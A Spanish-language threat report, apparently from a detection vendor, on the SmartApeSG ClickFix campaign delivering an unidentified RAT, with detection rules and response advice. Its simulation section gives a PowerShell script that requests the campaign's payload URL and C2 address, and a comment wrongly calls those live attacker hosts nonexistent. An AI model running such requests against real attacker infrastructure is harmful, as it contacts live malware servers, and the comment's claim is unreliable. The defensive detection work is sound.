SmartApeSG Distribuye un RAT Desconocido a Través de Señuelos ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
La campaña SmartApeSG utiliza la técnica ClickFix para engañar a los usuarios y hacerles ejecutar comandos maliciosos a través de páginas falsas de CAPTCHA o verificación humana. Esta acción lanza un archivo HTA que descarga y extrae un archivo ZIP malicioso. La carga final es un troyano de acceso remoto (RAT) no identificado que depende de la carga lateral de DLL para establecer persistencia y comunicarse con su infraestructura C2.
Investigación
La investigación incluyó el análisis de tráfico HTTPS, archivos PCAP y archivos maliciosos vinculados a la actividad de SmartApeSG. Los investigadores identificaron JavaScript malicioso inyectado en sitios web legítimos y rastrearon la cadena de infección desde un comando inyectado en el portapapeles hasta la conexión final con el C2. Se observó que el RAT se comunicaba con una dirección IP externa a través del puerto 443 utilizando tráfico cifrado.
Mitigación
Las organizaciones deben usar el filtrado web para bloquear dominios maliciosos conocidos, incluyendo pewtercanto[.]top and deltaode[.]com. Los usuarios deben ser entrenados para reconocer métodos de ingeniería social como CAPTCHAs falsos e instrucciones ClickFix. Restringir la ejecución de archivos HTA y monitorear procesos secundarios sospechosos lanzados por navegadores o comandos Run puede reducir aún más el riesgo.
Respuesta
Si se detecta actividad de SmartApeSG, el punto final afectado debe ser aislado inmediatamente para interrumpir la comunicación con el C2. Los investigadores deben examinar los directorios AppData y Documentos para identificar el RAT y sus mecanismos de persistencia. También se debe revisar la telemetría de los puntos finales en busca de ejecución no autorizada de HTA, manipulación del portapapeles y actividad de carga lateral de DLL.
Flujo de Ataque
Detecciones
Comando y Control Sospechoso por Solicitud DNS de Dominio de Nivel Superior (TLD) Inusual (via dns)
Proof of Value
Variables de Entorno Sospechosas (via cmdline)
Proof of Value
Ejecución Sospechosa de Mshta Sin Archivo HTA (via cmdline)
Proof of Value
Dominio de Nivel Superior Inusual en la Línea de Comandos (via cmdline)
Proof of Value
IOCs (HashSha256) para detectar: Campaña ClickFix de SmartApeSG Empuja RAT No Identificado
Proof of Value
IOCs (SourceIP) para detectar: Campaña ClickFix de SmartApeSG Empuja RAT No Identificado
Proof of Value
IOCs (DestinationIP) para detectar: Campaña ClickFix de SmartApeSG Empuja RAT No Identificado
Proof of Value
Actividad de RAT en la Campaña ClickFix de SmartApeSG [Conexión de Red de Windows]
Proof of Value
Detección de RAT No Identificado a través de Carga Lateral de DLL por Campaña de SmartApeSG [Evento de Archivo de Windows]
Proof of Value
Ejecución de Simulación
Prerequisito: La Verificación Pre-vuelo de Telemetría y Línea Base debe haber sido aprobada.
Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico incorrecto.
-
Narrativa del Ataque y Comandos: El adversario está ejecutando la campaña ClickFix de SmartApeSG. Después de que un usuario es engañado para realizar una acción maliciosa (a menudo una actualización falsa del navegador), el sistema intenta descargar un archivo HTA malicioso. Luego, el HTA inicia una conexión con la infraestructura C2 para descargar la carga final del RAT. Para simular esto, generaremos solicitudes de red que contengan las cadenas exactas definidas en la lógica de detección:
deltaode.compo,deltaode.com/wv, y la IP89.124.79.98. -
Guion de Prueba de Regresión:
# Guion de simulación para activar la regla de detección de SmartApeSG # Este guion simula las solicitudes de red a los IoCs específicos $urls = @( "https://deltaode.compo/payload.hta", "https://deltaode.com/wv/malicious.exe", "http://89.124.79.98:443/c2_checkin" ) foreach ($url in $urls) { Write-Host "Simulando solicitud a: $url" try { # Usando Invoke-WebRequest para generar la telemetria de red # Utilizamos -ErrorAction SilentlyContinue porque estos dominios no existen realmente Invoke-WebRequest -Uri $url -UseBasicParsing -ErrorAction SilentlyContinue } catch { Write-Host "Solicitud fallida (esperado), pero la telemetría debería generarse." } } -
Comandos de Limpieza:
# No se hicieron cambios permanentes en el sistema; no se requiere limpieza. Write-Host "Simulación completa. No quedan artefactos en el sistema."